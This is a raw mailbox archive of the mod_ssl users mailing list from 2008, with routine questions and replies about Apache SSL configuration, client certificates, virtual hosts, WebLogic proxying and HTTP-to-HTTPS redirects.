Thanks,

Mat






______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar  5 17:45:17 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A06AA14DA28; Wed,  5 Mar 2008 17:45:17 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from kuber.nabble.com (kuber.nabble.com [216.139.236.158])
	by master.modssl.org (Postfix) with ESMTP id 0B90D14D82F
	for ; Wed,  5 Mar 2008 17:45:16 +0100 (CET)
Received: from isper.nabble.com ([192.168.236.156])
	by kuber.nabble.com with esmtp (Exim 4.63)
	(envelope-from )
	id 1JWwjf-0002tR-Jx
	for modssl-users@modssl.org; Wed, 05 Mar 2008 08:44:55 -0800
Message-ID: <15852947.post@talk.nabble.com>
Date: Wed, 5 Mar 2008 08:44:55 -0800 (PST)
From: Dan Osterrath 
To: modssl-users@modssl.org
Subject: SSLVerifyClient with IE7
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Nabble-From: Dan.Osterrath@gmx.de
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dan Osterrath 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I've already asked the question in the users@httpd.apache.org mailing list
but here it might be more suitable:

I've setup a https site with Apache 2.0.52, mod_ssl 2.0.52 and OpenSSL
0.9.7a (Red Hat Enterprise Linux ES release 4 (Nahant Update 4)). A special
directory should be optional authenticated via client certificate. This
works with Firefox, Netscape, IE6 but not with IE7 (Windows XP SP2 and
Windows Vista).

When trying to access the page with IE7 the browser let me choose the client
certificate, let me enter the PIN for the smartcard but then shows the error
message "The browser can not connect to the site.". In the log files of the
server there's only 1 new line:

    [error] Re-negotiation handshake failed: Not accepted by client!?

Here's the httpd.conf part for SSL:

    SSLEngine on
    SSLProtocol +SSLv3
    SSLCipherSuite HIGH:MEDIUM:SSLv3
    SSLCertificateFile /etc/httpd/conf/ssl.crt/mydomain.crt
    SSLCertificateKeyFile /etc/httpd/conf/ssl.key/mydomain.key
    SSLCACertificateFile /etc/httpd/conf/ssl.crt/mydomain.ca-bundle
    SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown
downgrade-1.0 force-response-1.0

    
      SSLVerifyClient optional
      SSLVerifyDepth 5
      SSLOptions +FakeBasicAuth +StdEnvVars +ExportCertData +OptRenegotiate
    

Any suggestions?

-----
-- 
Trees die standing.
-- 
View this message in context: http://www.nabble.com/SSLVerifyClient-with-IE7-tp15852947p15852947.html
Sent from the mod_ssl - Users mailing list archive at Nabble.com.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Mar 16 16:59:31 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id AD7F414DA3E; Sun, 16 Mar 2008 16:59:31 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from pints.com (i216-58-85-230.gta.igs.net [216.58.85.230])
	by master.modssl.org (Postfix) with ESMTP id 3B45614D83F
	for ; Sun, 16 Mar 2008 16:59:29 +0100 (CET)
Received: from [192.168.1.2] (192.168.1.2) by pints.com with ESMTP (Eudora
 Internet Mail Server X 3.2.5) for ;
 Sun, 16 Mar 2008 11:59:08 -0400
Mime-Version: 1.0 (Apple Message framework v753)
Content-Transfer-Encoding: 7bit
Message-Id: <5285ED50-D9A5-4318-9D3D-1E38F56B672A@viaduct-productions.com>
Content-Type: text/plain; charset=US-ASCII; format=flowed
To: Submit SSL 
From: Rich 
Subject: [OT] test
Date: Sun, 16 Mar 2008 11:59:06 -0400
X-Mailer: Apple Mail (2.753)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Rich 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

this list active?


Cheers

Rich in Toronto

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Mar 16 17:03:16 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9916214DA3E; Sun, 16 Mar 2008 17:03:16 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from smtp05.bis.na.blackberry.com (smtp05.bis.na.blackberry.com [216.9.248.52])
	by master.modssl.org (Postfix) with ESMTP id 4911F14D83F
	for ; Sun, 16 Mar 2008 17:03:14 +0100 (CET)
Received: from bda049.bis.na.blackberry.com (bda049.bisx.prod.on.blackberry [172.20.224.109])
	by srs.bis.na.blackberry.com (8.13.7 TEAMON/8.13.7) with ESMTP id m2GG2jZ4004081
	for ; Sun, 16 Mar 2008 16:02:45 GMT
Received: from bda049-cell00.bisx.prod.on.blackberry (localhost.localdomain [127.0.0.1])
	by bda049.bis.na.blackberry.com (8.13.4 TEAMON/8.13.4) with ESMTP id m2GG2jwt022831
	for ; Sun, 16 Mar 2008 16:02:45 GMT
X-rim-org-msg-ref-id: 1518213838
Message-ID: <1518213838-1205683362-cardhu_decombobulator_blackberry.rim.net-1691120607-@bxe142.bisx.prod.on.blackberry>
Content-Transfer-Encoding: base64
X-Priority: Normal
Sensitivity: Normal
Importance: Normal
To: modssl-users@modssl.org
Subject: Re: [OT] test
From: dan@cpanel.net
Date: Sun, 16 Mar 2008 15:59:26 +0000
Content-Type: text/plain; charset="Windows-1252"
MIME-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: dan@cpanel.net
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

SXQgZGVwZW5kcyBvbiB0aGUgc2Vuc2Ugb2YgJ2FjdGl2ZScgOikNCg0KLS0tLS0tT3JpZ2luYWwg
TWVzc2FnZS0tLS0tLQ0KRnJvbTogUmljaA0KU2VuZGVyOiBvd25lci1tb2Rzc2wtdXNlcnNAbW9k
c3NsLm9yZw0KVG86IFN1Ym1pdCBTU0wNClJlcGx5VG86IG1vZHNzbC11c2Vyc0Btb2Rzc2wub3Jn
DQpTZW50OiBNYXIgMTYsIDIwMDggMTA6NTkgQU0NClN1YmplY3Q6IFtPVF0gdGVzdA0KDQp0aGlz
IGxpc3QgYWN0aXZlPw0KDQoNCkNoZWVycw0KDQpSaWNoIGluIFRvcm9udG8NCg0KX19fX19fX19f
X19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19f
X19fXw0KQXBhY2hlIEludGVyZmFjZSB0byBPcGVuU1NMIChtb2Rfc3NsKSAgICAgICAgICAgICAg
ICAgICB3d3cubW9kc3NsLm9yZw0KVXNlciBTdXBwb3J0IE1haWxpbmcgTGlzdCAgICAgICAgICAg
ICAgICAgICAgICBtb2Rzc2wtdXNlcnNAbW9kc3NsLm9yZw0KQXV0b21hdGVkIExpc3QgTWFuYWdl
ciAgICAgICAgICAgICAgICAgICAgICAgICAgICBtYWpvcmRvbW9AbW9kc3NsLm9yZw0KDQoNClNl
bnQgZnJvbSBteSBCbGFja0JlcnJ5riB3aXJlbGVzcyBoYW5kaGVsZA==


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Mar 16 17:13:49 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7A6AD14DA3E; Sun, 16 Mar 2008 17:13:49 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from pints.com (i216-58-85-230.gta.igs.net [216.58.85.230])
	by master.modssl.org (Postfix) with ESMTP id DF11C14D83F
	for ; Sun, 16 Mar 2008 17:13:48 +0100 (CET)
Received: from [192.168.1.2] (192.168.1.2) by pints.com with ESMTP (Eudora
 Internet Mail Server X 3.2.5) for ;
 Sun, 16 Mar 2008 12:13:28 -0400
Mime-Version: 1.0 (Apple Message framework v753)
Content-Transfer-Encoding: 7bit
Message-Id: <49E055BC-8217-4DEE-BA5E-5172AAD695A0@viaduct-productions.com>
Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed
To: Submit SSL 
From: Rich 
Subject: SSL working on 192.168.0.10 not VHost
Date: Sun, 16 Mar 2008 12:13:24 -0400
X-Mailer: Apple Mail (2.753)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Rich 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

OK, so the list works.  Just very quiet I suppose.

I just went through some instructions to get my own cert going.  Well  
she's working, but only on the box as a local IP, and not the domain  
I wish to point it at.

ssl.conf is being read by configtest.  returns OK

In ssl.conf I have:

Listen 80
Listen 443
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin



	SSLEngine on
	ServerName domain.com
	ServerAdmin 
	ErrorLog /var/log/ssl_error_log.log
	
	SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:! 
EXP:!eNULL
	SSLCertificateFile /Users/me/Documents/certs/mydomain/newcert.pem
	SSLCertificateKeyFile /Users/me/Documents/certs/mydomain/ 
webserver.nopass.key
	SSLCACertificateFile /Users/me/Documents/certs/demoCA/cacert.pem
	SSLCARevocationPath /Users/me/Documents/certs/demoCA/crl



(this has been modified for posting here)

So she works as a local box, but not as a VHost.  That made me look  
at the apache conf file for ssl, and I can't see any problem with it.

Any ideas as to how I chase this up?

Cheers

Rich in Toronto

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Mar 16 21:12:45 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A2EC414DA2B; Sun, 16 Mar 2008 21:12:45 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from pints.com (i216-58-85-230.gta.igs.net [216.58.85.230])
	by master.modssl.org (Postfix) with ESMTP id 43E5814D83F
	for ; Sun, 16 Mar 2008 21:12:44 +0100 (CET)
Received: from [192.168.1.2] (192.168.1.2) by pints.com with ESMTP (Eudora
 Internet Mail Server X 3.2.5) for ;
 Sun, 16 Mar 2008 16:12:24 -0400
Mime-Version: 1.0 (Apple Message framework v753)
In-Reply-To: <49E055BC-8217-4DEE-BA5E-5172AAD695A0@viaduct-productions.com>
References: <49E055BC-8217-4DEE-BA5E-5172AAD695A0@viaduct-productions.com>
Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed
Message-Id: <4873B461-CB6D-468A-9CB8-165F4A281283@viaduct-productions.com>
Content-Transfer-Encoding: 7bit
From: Rich 
Subject: Re: SSL not working
Date: Sun, 16 Mar 2008 16:12:21 -0400
To: modssl-users@modssl.org
X-Mailer: Apple Mail (2.753)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Rich 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

OK, scratch that.  Now it ain't workin at all.

root# curl https://localhost/
curl: (35) error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown  
protocol

Would it be a good idea to start over?  Not really sure where to go  
with this.

On Mar 16, 2008, at 12:13 PM, Rich wrote:

> I just went through some instructions to get my own cert going.   
> Well she's working, but only on the box as a local IP, and not the  
> domain I wish to point it at.


Cheers

Rich in Toronto

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 17 10:53:00 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2498514DA46; Mon, 17 Mar 2008 10:53:00 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mails.arisglobal.co.in (mails.arisglobal.co.in [164.164.144.21])
	by master.modssl.org (Postfix) with ESMTP id C6C0E14D868
	for ; Mon, 17 Mar 2008 10:52:58 +0100 (CET)
Received: from indxchange01.agi.com ([192.168.103.14]) by mails.arisglobal.co.in with Microsoft SMTPSVC(6.0.3790.3959); Mon, 17 Mar 2008 15:22:24 +0530
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.4133
Content-Class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C88814.C2230800"
Subject: Problem in configuring Weblogic with ssl enabled apache
Date: Mon, 17 Mar 2008 15:23:31 +0530
Message-ID: <05320D8FE728A846AC1973B86F8026A901A3FED2@indxchange01.agi.com>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Problem in configuring Weblogic with ssl enabled apache
thread-index: AciIFMG1HHFreA8aTW2OofAJKq26Dw==
From: "Praveen Pasi" 
To: 
X-OriginalArrivalTime: 17 Mar 2008 09:52:24.0046 (UTC) FILETIME=[99C2C0E0:01C88814]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Praveen Pasi" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C88814.C2230800
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

Hi,

I have enabled SSL port on weblogic and using demo certificates.

I have installed Apache 2.0.63 [ssl enabled].

I have to open an MSWord file both in read only and editable.

But the problem is MS Word always opens in read only mode.

=20

I have added the following lines in httpd.conf file.

=20



    WebLogicHost sapwp08

    WebLogicPort 7002   =20

    MatchExpression *.jsp

MatchExpression *.do

MatchExpression *

SecureProxy ON

EnforceBasicConstraints OFF



=20

=20

and  removed comment for the below line.

=20

LoadModule ssl_module modules/mod_ssl.so.

=20

=20

Kinly help me in establishing ssl connection with weblogic and apache.

=20

=20

Regards,

Praveen

=20


 Legal Notice: This transmission, including any attachments, is =
confidential, proprietary, and may be privileged. It is intended solely =
for
 the intended recipient. If you are not the intended recipient, you have =
received this transmission in error and you are hereby advised that any
 review, disclosure, copying, distribution, or use of this transmission, =
or any of the information included therein, is unauthorized and strictly
 prohibited. If you have received this transmission in error, please =
immediately notify the sender by reply and permanently delete all copies =
of
 this transmission and its attachments





------_=_NextPart_001_01C88814.C2230800
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable




















Hi,



I have enabled SSL port on weblogic and using demo
certificates.



I have installed Apache 2.0.63 [ssl =
enabled].



I have to open an MSWord file both in read only and
editable.



But the problem is MS Word always opens in read only =
mode.



 



I have added the following lines in httpd.conf =
file.



 



<IfModule =
mod_weblogic.c>



    WebLogicHost =
sapwp08



    WebLogicPort =
7002    



    MatchExpression =
*.jsp



MatchExpression *.do



MatchExpression *



SecureProxy ON


EnforceBasicConstraints =
OFF



</IfModule>



 



 



and  removed comment for the below =
line.



 



LoadModule ssl_module =
modules/mod_ssl.so.



 



 



Kinly help me in establishing ssl connection with =
weblogic
and apache.



 



 



Regards,



Praveen



 








 Legal Notice: This =
transmission, including any attachments, is confidential, proprietary, =
and may be privileged. It is intended solely for the intended recipient. =
If you are not the intended recipient, you have  received this =
transmission in error and you are hereby advised that any review, =
disclosure, copying, distribution, or use of this transmission, or any =
of the information included therein, is unauthorized and =
strictly prohibited. If you have received this transmission in =
error, please immediately notify the sender by reply and permanently =
delete all copies of this transmission and its attachments


 


------_=_NextPart_001_01C88814.C2230800--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 31 18:35:05 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id CECF714DA2E; Mon, 31 Mar 2008 18:35:04 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from msp-srv01.msphq.local (89-145-218-243.xdsl.murphx.net [89.145.218.243])
	by master.modssl.org (Postfix) with ESMTP id 326DA14D873
	for ; Mon, 31 Mar 2008 18:35:04 +0200 (CEST)
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable
Subject: Bad request when users goto http://www.mydomain.com:443
X-MimeOLE: Produced By Microsoft Exchange V6.5
Date: Mon, 31 Mar 2008 17:34:38 +0100
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Bad request when users goto http://www.mydomain.com:443
Thread-Index: AciTTRz9JT5PWPJ6S+CwjVRlUpD3DQ==
From: "Dean Pullen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dean Pullen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

We get the following error:

Bad Request

Your browser sent a request that this server could not understand.
Reason: You're speaking plain HTTP to an SSL-enabled server port.
Instead use the HTTPS scheme to access this URL, please.

    Hint: https://www.mydomain.com/

When users go to http//www.mydomain.com:443 - which we obviously need to
catch and redirect to https://www.mydomain.com=20

What's the best way of achieving this?

We have two virtual hosts setup one on port 80 (which is already
redirecting http traffic on port 80 to https on port 443) and one on
443.=20
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 31 19:06:40 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 07C7014DA2E; Mon, 31 Mar 2008 19:06:40 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from n19.bullet.mail.mud.yahoo.com (n19.bullet.mail.mud.yahoo.com [68.142.206.146])
	by master.modssl.org (Postfix) with SMTP id E609A14D873
	for ; Mon, 31 Mar 2008 19:06:38 +0200 (CEST)
Received: from [209.191.108.96] by n19.bullet.mail.mud.yahoo.com with NNFMP; 31 Mar 2008 17:06:13 -0000
Received: from [209.191.119.164] by t3.bullet.mud.yahoo.com with NNFMP; 31 Mar 2008 17:06:14 -0000
Received: from [127.0.0.1] by omp103.mail.mud.yahoo.com with NNFMP; 31 Mar 2008 17:06:14 -0000
X-Yahoo-Newman-Property: ymail-5
X-Yahoo-Newman-Id: 692834.32484.bm@omp103.mail.mud.yahoo.com
Received: (qmail 92743 invoked by uid 60001); 31 Mar 2008 17:06:13 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.co.uk;
  h=X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding:Message-ID;
  b=nw9iuSj6kv3dats6nvU721rQK6FRujV55prXZBN3A8sFc6Ue/IOIeW0FHgRjJC6l8dMk118Xk6ijhAjbzw0mtXMzCHncX3jhQrPiNKmVhy5wVB837hWSRJ22GzeYybt4TjiLu+VmJWQ91J2MbLchXfTZMGQEt+IH55Xl4/mL3e8=;
X-YMail-OSG: rtdvm0MVM1lGM9nEE_DYmp_xmJwoqScN4cQWthKeJyDWaO8xx2HTuJgpLz0w_tzirMRCh.8T84AFd9kMpCvXIu02BpiV5xn0YZTcrcXFsMixhJE03M4L8y3Q1os-
Received: from [213.83.65.106] by web25804.mail.ukl.yahoo.com via HTTP; Mon, 31 Mar 2008 17:06:13 GMT
X-Mailer: YahooMailRC/902.40 YahooMailWebService/0.7.185
Date: Mon, 31 Mar 2008 17:06:13 +0000 (GMT)
From: Glyn Astill 
Subject: Re: Bad request when users goto http://www.mydomain.com:443
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: quoted-printable
Message-ID: <243568.91092.qm@web25804.mail.ukl.yahoo.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Glyn Astill 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Possibly use a RewriteRule or something of the sort?=0A=0ARewriteEngine On=
=0ARewriteCond %{HTTP_HOST} .=0ARewriteCond %{HTTP_HOST} ^www\.mydomain\.co=
m$=0ARewriteCond %{SERVER_PORT} ^443$=0ARewriteRule ^(.*) https://www.mydom=
ain.com/$1 [R=3D301,L]=0A=0AI've not tested that, and I doub't it's spot on=
 but hopefully it's the right direction...=0A=0A----- Original Message ----=
=0A> From: Dean Pullen =0A> To: modssl-users@modssl=
..org=0A> Sent: Monday, 31 March, 2008 5:34:38 PM=0A> Subject: Bad request w=
hen users goto http://www.mydomain.com:443=0A> =0A> We get the following er=
ror:=0A> =0A> Bad Request=0A> =0A> Your browser sent a request that this se=
rver could not understand.=0A> Reason: You're speaking plain HTTP to an SSL=
-enabled server port.=0A> Instead use the HTTPS scheme to access this URL, =
please.=0A> =0A>     Hint: https://www.mydomain.com/=0A> =0A> When users go=
 to http//www.mydomain.com:443 - which we obviously need to=0A> catch and r=
edirect to https://www.mydomain.com =0A> =0A> What's the best way of achiev=
ing this?=0A> =0A> We have two virtual hosts setup one on port 80 (which is=
 already=0A> redirecting http traffic on port 80 to https on port 443) and =
one on=0A> 443. =0A> ______________________________________________________=
________________=0A> Apache Interface to OpenSSL (mod_ssl)                 =
  www.modssl.org=0A> User Support Mailing List                      modssl-=
users@modssl.org=0A> Automated List Manager                            majo=
rdomo@modssl.org=0A> =0A=0A=0A=0A=0A      _________________________________=
_________________________=0ASent from Yahoo! Mail.=0AA Smarter Inbox http:/=
/uk.docs.yahoo.com/nowyoucan.html

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 31 19:19:03 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id DEBA614DA34; Mon, 31 Mar 2008 19:19:03 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from el-out-1112.google.com (el-out-1112.google.com [209.85.162.182])
	by master.modssl.org (Postfix) with ESMTP id 0C01514D873
	for ; Mon, 31 Mar 2008 19:18:59 +0200 (CEST)
Received: by el-out-1112.google.com with SMTP id n30so534742elf.7
        for ; Mon, 31 Mar 2008 10:18:35 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=beta;
        h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        bh=KPUxmB/Fbsv2dbieCFd31katw1BN7tXu06N1bMdkEQo=;
        b=MZB+UDyltf7fHgHcqve1EnlzYsClm/kvKbh84v+MqRIP9gxPN+JQmNuDSmjTBMDA7jEJYxbwqlKkhMVd9Lw3l11PEL/QtAP0YSxCmL3St9WoEevD05YACHZs5VUkSIqgx4D9it7fPxFa+5B5YewLuP0xf9MX/igo3eOiWkWVefA=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=beta;
        h=message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=VqKbYAQu9R/A5gMeOEf/yhqIf8LkZD8zTQvI577OC9h2MVuFgl6D/sPGEhgDECSAJNvfRK0ayuhkJEKGiQyHi+b1q+9XYrWAjN1TWHgw78dVUEDhrkooSyiG5n8wniEHj1r4ekENVS1onKJCRMPmaXfw3uEnGV4xa+zSwglGLnU=
Received: by 10.115.79.1 with SMTP id g1mr10477723wal.43.1206983914459;
        Mon, 31 Mar 2008 10:18:34 -0700 (PDT)
Received: by 10.114.56.15 with HTTP; Mon, 31 Mar 2008 10:18:34 -0700 (PDT)
Message-ID: <1dfe5f1d0803311018i4e13e20fh4dda9a993eea6db@mail.gmail.com>
Date: Mon, 31 Mar 2008 13:18:34 -0400
From: "Walt Williams" 
To: modssl-users@modssl.org
Subject: Re: Bad request when users goto http://www.mydomain.com:443
In-Reply-To: <243568.91092.qm@web25804.mail.ukl.yahoo.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
References: <243568.91092.qm@web25804.mail.ukl.yahoo.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Walt Williams" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

The rewriterule can be explointed on unpatched Apache.  If you're
doing this, make certain you're working with the current patch.

Otherwise, use an application layer redirector/load balancer.

Walt

On 3/31/08, Glyn Astill  wrote:
> Possibly use a RewriteRule or something of the sort?
>
> RewriteEngine On
> RewriteCond %{HTTP_HOST} .
> RewriteCond %{HTTP_HOST} ^www\.mydomain\.com$
> RewriteCond %{SERVER_PORT} ^443$
> RewriteRule ^(.*) https://www.mydomain.com/$1 [R=301,L]
>
> I've not tested that, and I doub't it's spot on but hopefully it's the right direction...
>
> ----- Original Message ----
> > From: Dean Pullen 
> > To: modssl-users@modssl..org
> > Sent: Monday, 31 March, 2008 5:34:38 PM
> > Subject: Bad request when users goto http://www.mydomain.com:443
> >
> > We get the following error:
> >
> > Bad Request
> >
> > Your browser sent a request that this server could not understand.
> > Reason: You're speaking plain HTTP to an SSL-enabled server port.
> > Instead use the HTTPS scheme to access this URL, please.
> >
> >     Hint: https://www.mydomain.com/
> >
> > When users go to http//www.mydomain.com:443 - which we obviously need to
> > catch and redirect to https://www.mydomain.com
> >
> > What's the best way of achieving this?
> >
> > We have two virtual hosts setup one on port 80 (which is already
> > redirecting http traffic on port 80 to https on port 443) and one on
> > 443.
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
>
>
>
>
>      __________________________________________________________
> Sent from Yahoo! Mail.
> A Smarter Inbox http://uk.docs.yahoo.com/nowyoucan.html
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>


-- 
Walt Williams, CISSP, SSCP
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr  1 17:32:12 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id DF58A14DA36; Tue,  1 Apr 2008 17:32:12 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from web65716.mail.ac4.yahoo.com (web65716.mail.ac4.yahoo.com [76.13.9.108])
	by master.modssl.org (Postfix) with SMTP id E476714D835
	for ; Tue,  1 Apr 2008 17:32:10 +0200 (CEST)
Received: (qmail 55442 invoked by uid 60001); 1 Apr 2008 15:31:47 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type:Message-ID;
  b=pi342YQ4gY0IC7uQPlPJFSGFIeIvnz3BhJVTwCZUSCFnV+ZskV/HtteV6fj8dbBAikpbJArNWIe3S4IR2Fd7iz56R8mcRDbQBfMpwMHGpA4WRSd150rKxV+c3poDlALF2mzrOVfh6ivYtO0IwUOSoUm2o0i3/gQ9CigcOX1KVyY=;
X-YMail-OSG: PKvycGYVM1kn4xeovtUYQiPvbriL5_y6K_kHcE.51nuhTM5v_Nr6MFe_TAvGsWUkXc4Qa5Gjqx0nUR3byIqvZNpFlvRl8c_vrEAfBK4dqvvh.Y6h648-
Received: from [68.223.73.122] by web65716.mail.ac4.yahoo.com via HTTP; Tue, 01 Apr 2008 08:31:47 PDT
X-Mailer: YahooMailRC/902.40 YahooMailWebService/0.7.185
Date: Tue, 1 Apr 2008 08:31:47 -0700 (PDT)
From: Sir June 
Subject: mod_ssl 2.2.3
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="0-2038167095-1207063907=:55197"
Message-ID: <440852.55197.qm@web65716.mail.ac4.yahoo.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sir June 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--0-2038167095-1207063907=:55197
Content-Type: text/plain; charset=us-ascii

I have a Solaris box with Apache 2.2.3  and mod_ssl 2.2.3.   Our security consultant ran a vulnerability software and the report recommended to upgrade to mod_ssl 2.8.24      or higher.     Is this possible ?  as i only see releases  for  Apache 1.3.x   What are your recommendations?

